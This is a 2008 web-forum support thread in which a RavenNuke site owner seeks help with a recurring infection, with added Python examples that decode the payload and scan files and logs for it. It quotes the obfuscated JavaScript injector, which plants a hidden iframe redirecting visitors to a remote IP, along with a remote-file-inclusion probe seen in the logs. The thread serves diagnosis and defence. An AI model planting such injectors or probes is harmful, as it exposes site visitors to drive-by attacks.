lokasher
New Member


Joined: Mar 27, 2006
Posts: 17
|
Posted:
Sat Nov 01, 2008 6:22 am |
|
Hi there,
This script is written in each and every .php and .html file.
Code:
<script>
var temp="",i,c=0,out="";
var if_uniq_var="29102008";
var start_time="31 Oct 2008 19:38:00";
// '!'-separated decimal character codes; the string was split over two lines
// in the post, so it is joined here with + to keep it valid JavaScript
var str="60!105!102!114!97!109!101!32!115!114!99!61!34!105!112!111!100!115!117!120!120!46!104!116!109!108!34!32" +
"!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!";
l=str.length;
while(c<=str.length-1)
{
// collect digits up to the next '!' and turn that number into one character
while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
c++;
out=out+String.fromCharCode(temp);
temp="";
}
// decodes to: <iframe src="ipodsuxx.html" frameborder="0" style="display:none"></iframe>
document.write(out);
</script>
|
and this file, ipodsuxx.html, with the code
Code:
<html>
<head>
<meta http-equiv="refresh" content="1;URL=http://91.203.93.49/cgi-bin/index.cgi?iu1">
</head>
<body>
</body>
</html>
|
is in every folder, no matter how many times I remove and edit files.
I was using phpnuke 8.0 patched, but two weeks back I downgraded to RN 2.3. I thought this might solve my problem, but this script and file keep coming back.
Can someone please help me solve my problem?
[Admin: I split the code to avoid scrolling] |
|
|
|
 |
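Decoding the payload from the post above, as an added example that is not part of the original post and not RavenNuke code. OBFUSCATED is the exact char-code string posted (re-joined from the two halves the admin split it into); SAMPLE_PAGE and DROPPER_HTML are constructed here from the two snippets in that post. Nothing executes the injected script: the decoder only repeats the loop's arithmetic so you can read what document.write() would have emitted, then follows the hidden iframe to the dropper page and its meta refresh.

```python
"""Decode the '!'-delimited char-code injector and follow it to the dropper."""
import re

# The two halves exactly as posted, joined back into the original literal.
OBF_PART1 = ("60!105!102!114!97!109!101!32!115!114!99!61!34!105!112!111!100!115!117"
             "!120!120!46!104!116!109!108!34!32")
OBF_PART2 = ("!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!115!116!121"
             "!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60"
             "!47!105!102!114!97!109!101!62!")
OBFUSCATED = OBF_PART1 + OBF_PART2


def decode_bang_codes(payload):
    """Each '!'-terminated decimal is one character code (the script's loop)."""
    return "".join(chr(int(tok)) for tok in payload.split("!") if tok)


# var str="..." possibly broken over lines, possibly written as "..." + "...";
STR_RE = re.compile(r'var\s+str\s*=\s*((?:"[0-9!\s]*"\s*\+?\s*)+);')


def decode_injected_scripts(html):
    """Return the decoded output of every injector found in a page."""
    decoded = []
    for literal in STR_RE.findall(html):
        payload = re.sub(r"[^0-9!]", "", literal)  # drop quotes, '+', whitespace
        decoded.append(decode_bang_codes(payload))
    return decoded


IFRAME_SRC_RE = re.compile(r'<iframe\b[^>]*\bsrc="([^"]+)"', re.I)
META_REFRESH_RE = re.compile(
    r'<meta\s+http-equiv="refresh"\s+content="\d+;\s*URL=([^"]+)"', re.I)


def iframe_sources(markup):
    """src attributes of every iframe in the decoded markup."""
    return IFRAME_SRC_RE.findall(markup)


def meta_refresh_target(markup):
    """URL a meta refresh sends the browser to, or None."""
    m = META_REFRESH_RE.search(markup)
    return m.group(1) if m else None


def follow_chain(page_html, dropper_html):
    """Infected page -> hidden iframe -> dropper page -> final redirect."""
    chain = []
    for decoded in decode_injected_scripts(page_html):
        for src in iframe_sources(decoded):
            chain.append(("iframe", src))
    target = meta_refresh_target(dropper_html)
    if target:
        chain.append(("refresh", target))
    return chain


# Constructed sample page: the posted script, string still split over two lines.
SAMPLE_PAGE = (
    "<html><body><p>normal page content</p>\n<script>\n"
    'var temp="",i,c=0,out="";\nvar if_uniq_var="29102008";\n'
    'var str="' + OBF_PART1 + "\n" + OBF_PART2 + '";\n'
    "l=str.length;\nwhile(c<=str.length-1)\n{\n"
    "while(str.charAt(c)!='!')temp=temp+str.charAt(c++);\nc++;\n"
    'out=out+String.fromCharCode(temp);\ntemp="";\n}\ndocument.write(out);\n'
    "</script>\n</body></html>"
)
# Constructed copy of the posted ipodsuxx.html.
DROPPER_HTML = (
    "<html>\n<head>\n"
    '<meta http-equiv="refresh" content="1;URL=http://91.203.93.49/cgi-bin/index.cgi?iu1">\n'
    "</head>\n<body>\n</body>\n</html>"
)

if __name__ == "__main__":
    for kind, where in follow_chain(SAMPLE_PAGE, DROPPER_HTML):
        print(kind, "->", where)
```

Run it against a file pulled off the server and the chain it prints tells you which local file the iframe loads and which remote address that file bounces visitors to; that address, not the filename, is what to search your logs and other sites for.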
Raven
Site Admin/Owner

Joined: Aug 27, 2002
Posts: 17088
|
Posted:
Sat Nov 01, 2008 10:58 am |
|
Looks like you have been hacked and there is a script installed somewhere, either on your server or within your root folder, that is adding the code to your scripts. Hosting with DreamHost by any chance? See http://forum.joomlaworks.gr/index.php?topic=5212.0 |
|
|
|
 |
Guardian2003
Site Admin

Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
|
Posted:
Sat Nov 01, 2008 12:36 pm |
|
I was conversing with a young guy on a forum elsewhere and his host (who will remain nameless) tried to charge the guy $275 to fix what they said was his problem on a fully managed VPS.
If I said it was the same problem it would give the game away, so let me say it was a similar exploit. |
|
|
|
 |
lokasher

|
Posted:
Sat Nov 01, 2008 2:45 pm |
|
Thanks for the reply.
No, it's not DreamHost.
I talked with them and they said they will upgrade the server; they are using PHP 4.2 at the moment, I guess.
Is there any solution? I mean, if it's installed in my root folder, can I delete it?
Thanks |
|
|
|
 |
Raven

|
Posted:
Sat Nov 01, 2008 4:15 pm |
|
Whether it's Dreamhost or not the issue is the same. Read that thread mentioned above and try to do what is outlined in it. 4.2 - YIKES! I'd find another host but regardless, if they think upgrading php is the answer then they don't have a clue. Bail while you have a chance  |
|
|
|
 |
Guardian2003

|
Posted:
Sat Nov 01, 2008 7:01 pm |
|
I have to agree with Raven and for the same reasons.
If they think upgrading PHP (regardless of the version number) will fix anything that is very, very worrying. |
|
|
|
 |
evaders99
Former Moderator in Good Standing

Joined: Apr 30, 2004
Posts: 3221
|
Posted:
Sun Nov 02, 2008 12:52 am |
|
Your server is compromised. Without knowing how they got in, these hackers are just likely to continue using it to launch further attacks.
Figuring out how they got in would be ideal. You should really start from scratch and get a clean backup loaded. |
|
|
 |
lokasher

|
Posted:
Mon Nov 03, 2008 2:10 am |
|
evaders99 wrote: | Your server is compromised. Without knowing how they got in, these hackers are just likely to continue using it to launch further attacks.
Figuring out how they got in would be ideal. You should really start from scratch and get a clean backup loaded. |
I did that already two times, but no use; these files keep coming back. |
|
|
|
 |
Raven

|
Posted:
Mon Nov 03, 2008 3:52 am |
|
Then that means either your backup contains the hacked scripts or the server itself is compromised. You will probably need to get your host involved to check the logs or whatever and help you locate the source and removal of the hack. |
|
|
|
 |
lokasher

|
Posted:
Mon Nov 03, 2008 6:25 am |
|
I installed a fresh RN 2.3, didn't use the backup file. |
|
|
|
 |
Susann
Moderator

Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support
|
Posted:
Mon Nov 03, 2008 8:28 am |
|
|
|
 |
Raven

|
Posted:
Mon Nov 03, 2008 10:18 am |
|
lokasher wrote: | I installed a fresh RN 2.3, didn't use the backup file. |
Then it's a server issue and your host needs to get involved. |
|
|
|
 |
lokasher

|
Posted:
Mon Nov 03, 2008 3:24 pm |
|
Susann wrote: | Did you already scan your system?
|
Yes, I did that.
Scanned my PC and the backup files, didn't find anything.
Then I searched for that script in all files; again all files were clear except backend.php, which contained the script (maybe that's because the backup was created at the time when I was replacing the files), but I'm sure I replaced it with all the other files.
Anyway, today again I deleted all files and folders and replaced them with new ones. Let's see now what happens.
Raven wrote: |
Then it's a server issue and your host needs to get involved.
|
This is what they told me:
Thank you for using our services!
Please note that most hackers' attacks are usually done through vulnerabilities in the website software which you are using (like forums, blogs, CMS). We cannot keep them secured as we are not the developers of such software. From our side, all server-side software (web services, FTP services, etc.) we are keeping up-to-date and protected. Anyway, it is strongly recommended to review everything that you have in the website folder and check web server logs to determine the way you may protect your application against further intrusions. If you have any widely-used software installed, check the vendor site for recent updates or security fixes.
As we are using shared servers, it is not possible to perform a server-side check of all the data being hosted. There are too many files and folders hosted in customers' directories, though we are performing whole-system updates and maintenance as frequently as needed. Thus, all viruses uploaded to software or features installed on the server are removed automatically, but we are not responsible for the contents placed in your domain directory.
The virus could have been uploaded to the server when you made an update to your website from the local backup. I would recommend that you download all the site data to your local PC and scan the whole system for viruses, including the website files. Then, please, re-upload it to the server.
Please let us know if there is anything else we can help you with. We are available 24/7. |
|
|
|
 |
Raven

|
Posted:
Mon Nov 03, 2008 3:47 pm |
|
- Get a new host - seriously. These guys don't have a clue!
Check your foot1 - foot3 settings in your config table using phpMyAdmin to see if there's code in there that is redirecting to a hacker script.
Check your cgi-bin folder to see if there are scripts that don't belong in there.
This will not be a virus, per se. So scanning your scripts will not (necessarily) detect a "footprint" as virus scanners do. There is a script that is running either within your account files or on the server that has to be adding those files.
Make sure that when you are examining your site using FTP that your FTP client is being invoked with the remote file mask of -a. |
|
|
|
 |
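The checks Raven lists in the post above, turned into an offline scan. This is an added example, not code from the thread or from RavenNuke: it looks in every file for the obfuscated injector, looks for the meta-refresh dropper page, reports files in cgi-bin that are not expected, surfaces dot-files (what an FTP list mask of -a or `ls -a` would reveal), and tests footer text copied out of foot1..foot3 in the config table. The web root built by build_sample_tree() is constructed for the example; the only strings taken from the thread are the injector's shape, the dropper page and the file name ipodsuxx.html. KNOWN_DOTFILES and KNOWN_CGI are assumptions to adjust for your own install.

```python
"""Offline scan of a web root for the injector, the dropper and stray files."""
import os
import re
import tempfile

# Injector signature: a '!'-separated char-code string fed to String.fromCharCode.
INJECT_RE = re.compile(r'var\s+str\s*=\s*"[0-9!\s]+"')
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(")
# Dropper page: meta refresh to a URL whose host is a bare IPv4 address.
DROPPER_RE = re.compile(
    r'http-equiv="refresh"[^>]*URL=https?://\d{1,3}(?:\.\d{1,3}){3}/', re.I)
KNOWN_DOTFILES = {".htaccess", ".htpasswd"}   # assumption: adjust for your host
KNOWN_CGI = set()                             # assumption: nothing belongs there


def suspicious_footer(text):
    """True when a foot1..foot3 value carries markup that can pull in code."""
    return bool(re.search(r"<(script|iframe|object|embed)\b|fromCharCode|eval\(",
                          text, re.I))


def classify_file(rel_path, data):
    """Reasons a single file (path relative to the web root) deserves a look."""
    reasons = []
    name = os.path.basename(rel_path)
    if name.startswith(".") and name not in KNOWN_DOTFILES:
        reasons.append("hidden file")
    if INJECT_RE.search(data) and FROMCHARCODE_RE.search(data):
        reasons.append("obfuscated iframe injector")
    if DROPPER_RE.search(data):
        reasons.append("meta-refresh dropper")
    if rel_path.split("/")[0] == "cgi-bin" and name not in KNOWN_CGI:
        reasons.append("unexpected file in cgi-bin")
    return reasons


def scan_webroot(root):
    """Walk the tree (os.walk does not skip dot-files) and map path -> reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                data = fh.read().decode("latin-1")   # never fails on odd bytes
            reasons = classify_file(rel, data)
            if reasons:
                findings[rel] = reasons
    return findings


# Constructed samples: a shortened injector of the same shape, and the dropper.
INJECTED_SCRIPT = (
    '<script>\nvar temp="",i,c=0,out="";\nvar if_uniq_var="29102008";\n'
    'var str="60!105!102!114!97!109!101!62!";\n'
    "while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);"
    'c++;out=out+String.fromCharCode(temp);temp="";}\ndocument.write(out);\n</script>'
)
DROPPER_HTML = ('<html><head><meta http-equiv="refresh" '
                'content="1;URL=http://91.203.93.49/cgi-bin/index.cgi?iu1">'
                "</head><body></body></html>")


def build_sample_tree():
    """Constructed web root: clean page, infected page, droppers, a stray
    dot-file and a stray CGI script. Returns the temporary root directory."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        "index.php": "<?php echo 'clean'; ?>",
        "modules.php": "<?php /* module loader */ ?>\n" + INJECTED_SCRIPT,
        "ipodsuxx.html": DROPPER_HTML,
        "admin/ipodsuxx.html": DROPPER_HTML,
        ".htaccess": "Options -Indexes\n",
        "blocks/.cache.php": "<?php /* not part of the install */ ?>",
        "cgi-bin/index.cgi": "#!/usr/bin/perl\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, why in sorted(scan_webroot(build_sample_tree()).items()):
        print(path, "->", ", ".join(why))
```

Point scan_webroot() at a download of the whole account, not just the RavenNuke folder, since a script planted above the web root or in cgi-bin is exactly what a fresh upload of RN 2.3 would not touch; the footer values have to be pasted in from phpMyAdmin by hand, which is what suspicious_footer() is for.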
Susann

|
Posted:
Mon Nov 03, 2008 4:19 pm |
|
That sounds like a typical standard answer from a hoster, but it's true they are not responsible for the content of your domain.
I personally believe one scan isn't enough to be sure a system isn't infected anymore.
Maybe you eliminated it with the new backend.php, but I would still check my logs and files. RavenNuke(tm) is very safe. That's all I can tell you because I never had such a problem, and I have used Nuke, and particularly RavenNuke(tm), for years.
Btw: the webmaster of a Joomla site with the same issue also did not find anything when he scanned his PC. But like I said above, that means nothing. |
|
|
|
 |
Raven

|
Posted:
Mon Nov 03, 2008 6:06 pm |
|
lokasher,
Did you find this file on your system - gz_eolas_fix.js? |
|
|
|
 |
lokasher

|
Posted:
Tue Nov 04, 2008 3:19 am |
|
Raven wrote: | lokasher,
Did you find this file on your system - gz_eolas_fix.js? |
Nope, this file is nowhere, either on my PC or the server.
Footer messages are clean and so is the cgi-bin folder.
The antivirus didn't detect the script in backend.php; I found it by a text search in all files. Just waiting till tomorrow to see what happens, because the virus was coming back after 3 days. |
|
|
|
 |
lokasher

|
Posted:
Thu Nov 06, 2008 1:25 am |
|
So far it's OK, nothing happened; hope it stays that way.
Thank you guys for your time and replies. |
|
|
|
 |
Raven

|
Posted:
Thu Nov 06, 2008 1:36 am |
|
|
|
 |
lokasher

|
Posted:
Fri Nov 07, 2008 3:05 pm |
|
I'm getting around 30 to 40 blocked abuse emails daily from this link, with different IP addresses. Any info on what this is and how to block it permanently?
Thanks
Code:
Created By: NukeSentinel(tm) 2.6.01
Date & Time: 2008-11-06 04:58:12 CST GMT -0600
Blocked IP: 118.6.230.117
User ID: Guest (1)
Reason: Abuse-Filter
--------------------
Referer: none
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP Host: www.xxxxxxx.com
Script Name: /modules.php
Query String: name=h**p://babycaleb.fortunecity.co.uk/index.htm?
Get String: name=h**p://babycaleb.fortunecity.co.uk/index.htm?
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 118.6.230.117
Remote Port: 2397
Request Method: GET
|
|
|
|
|
 |
Susann

|
Posted:
Fri Nov 07, 2008 6:04 pm |
|
|
|
 |
lokasher

|
Posted:
Sat Nov 08, 2008 7:42 am |
|
|
|
 |
lokasher

|
Posted:
Thu Nov 13, 2008 9:13 am |
|
It started again.
Two days back I found a strange file in the root dir; after deleting it I checked the log and found this, where this file was first called:
Code:
85.17.184.28 - - [11/Nov/2008:09:52:45 -0600] "GET /fins.html HTTP/1.1" 301 316 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:46 -0600] "GET /fins.html HTTP/1.1" 404 20840 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:47 -0600] "GET /fins.html HTTP/1.1" 302 20840 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:48 -0600] "GET /fins.html HTTP/1.1" 404 20840 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:48 -0600] "GET /xxxxxxx/fins.html HTTP/1.1" 301 324 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:49 -0600] "GET /xxxxxxx/fins.html HTTP/1.1" 404 15417 "-" "Python-urllib/2.5"
|
And today again an HTML file was in each and every folder, plus the script was added to files with .php and .html extensions, but this time the script was added only to the files in the /admin and /blocks/shortlinks folders.
In the log:
Code:
116.71.63.78 - - [13/Nov/2008:05:39:44 -0600] "GET /iu2.html HTTP/1.0" 200 135 "http://www.xxxxxx.com/" "Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1"
|
Any help on this, please? |
|
|
|
 |
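Triage of the access-log lines in the post above and of the NukeSentinel block report posted earlier in the thread, as an added example that is not code from the thread, NukeSentinel or RavenNuke. SAMPLE_LOG is the seven access-log lines as posted (the poster already masked the directory and domain as xxxxxxx); SENTINEL_REPORT is the block notice as posted. A URL placed in the `name` parameter of modules.php is a probe for remote file inclusion, which is why NukeSentinel's abuse filter blocks it and why the same request arrives from many different addresses. The scripted-client list, the miss threshold and the dropper file names are assumptions made for this example.

```python
"""Parse combined-format access logs and NukeSentinel reports; flag probes."""
import re
from collections import defaultdict

# Apache/NCSA combined log format.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
SCRIPTED_CLIENTS = ("python-urllib", "libwww-perl", "curl/", "wget/")  # assumption
DROPPER_NAMES = ("ipodsuxx.html", "iu2.html", "fins.html")              # from the thread
# A parameter whose value starts with a URL; NukeSentinel defangs http as h**p.
URL_IN_PARAM_RE = re.compile(r"(?:^|&)[^=&]+=h(?:tt|\*\*)ps?://", re.I)


def parse_log(text):
    """Parse combined-format lines; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = COMBINED_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def probe_summary(records, miss_threshold=3):
    """Per client IP: request count, scripted user agent, 4xx misses, flag."""
    per_ip = defaultdict(lambda: {"requests": 0, "misses": 0,
                                  "scripted": False, "paths": set()})
    for r in records:
        entry = per_ip[r["ip"]]
        entry["requests"] += 1
        entry["paths"].add(r["path"])
        if r["status"].startswith("4"):
            entry["misses"] += 1
        if any(tag in r["ua"].lower() for tag in SCRIPTED_CLIENTS):
            entry["scripted"] = True
    for entry in per_ip.values():
        entry["flagged"] = entry["scripted"] or entry["misses"] >= miss_threshold
    return dict(per_ip)


def dropper_hits(records, names=DROPPER_NAMES):
    """Requests for the dropped pages. A referer on our own site means a visitor's
    browser loaded the hidden iframe, i.e. the injection was live at that time."""
    return [(r["ip"], r["path"], r["referer"]) for r in records
            if r["path"].rsplit("/", 1)[-1] in names]


def parse_sentinel_report(text):
    """Turn the 'Field: value' lines of a NukeSentinel block e-mail into a dict."""
    fields = {}
    for line in text.splitlines():
        if ":" in line and not line.startswith("-"):
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
    return fields


def is_remote_include_attempt(query):
    """modules.php?name=<URL> is a probe for remote file inclusion."""
    return bool(URL_IN_PARAM_RE.search(query))


# The lines from the thread, reproduced as posted.
SAMPLE_LOG = """\
85.17.184.28 - - [11/Nov/2008:09:52:45 -0600] "GET /fins.html HTTP/1.1" 301 316 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:46 -0600] "GET /fins.html HTTP/1.1" 404 20840 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:47 -0600] "GET /fins.html HTTP/1.1" 302 20840 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:48 -0600] "GET /fins.html HTTP/1.1" 404 20840 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:48 -0600] "GET /xxxxxxx/fins.html HTTP/1.1" 301 324 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:49 -0600] "GET /xxxxxxx/fins.html HTTP/1.1" 404 15417 "-" "Python-urllib/2.5"
116.71.63.78 - - [13/Nov/2008:05:39:44 -0600] "GET /iu2.html HTTP/1.0" 200 135 "http://www.xxxxxx.com/" "Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1"
"""
SENTINEL_REPORT = """\
Created By: NukeSentinel(tm) 2.6.01
Date & Time: 2008-11-06 04:58:12 CST GMT -0600
Blocked IP: 118.6.230.117
User ID: Guest (1)
Reason: Abuse-Filter
--------------------
Referer: none
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP Host: www.xxxxxxx.com
Script Name: /modules.php
Query String: name=h**p://babycaleb.fortunecity.co.uk/index.htm?
Request Method: GET
"""

if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for ip, info in probe_summary(recs).items():
        print(ip, "flagged" if info["flagged"] else "ok", info["misses"], "misses")
    for hit in dropper_hits(recs):
        print("dropper fetched:", hit)
    report = parse_sentinel_report(SENTINEL_REPORT)
    print("RFI probe:", is_remote_include_attempt(report["Query String"]))
```

The scripted client hammering fins.html from one address and the later browser fetch of iu2.html with your own site as the referer are two different events: the first is someone checking whether their planted file is still reachable, the second is a real visitor's browser loading the hidden iframe, so the date on that second line tells you when the re-injection was live. The NukeSentinel mails are a separate, automated scan for an inclusion bug that a current RavenNuke does not have; they are noise to be rate-limited rather than evidence of the re-infection.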
evaders99

|
Posted:
Thu Nov 13, 2008 11:18 am |
|
Was the server actually cleaned and reformatted? Or the only thing that was done was loading a clean RavenNuke 2.3 files? |
|
|
|
 |
lokasher

|
Posted:
Thu Nov 13, 2008 12:58 pm |
|
evaders99 wrote: | Was the server actually cleaned and reformatted? Or the only thing that was done was loading a clean RavenNuke 2.3 files? |
Deleted the old files and uploaded RN 2.3, that's all. |
|
|
|
 |
|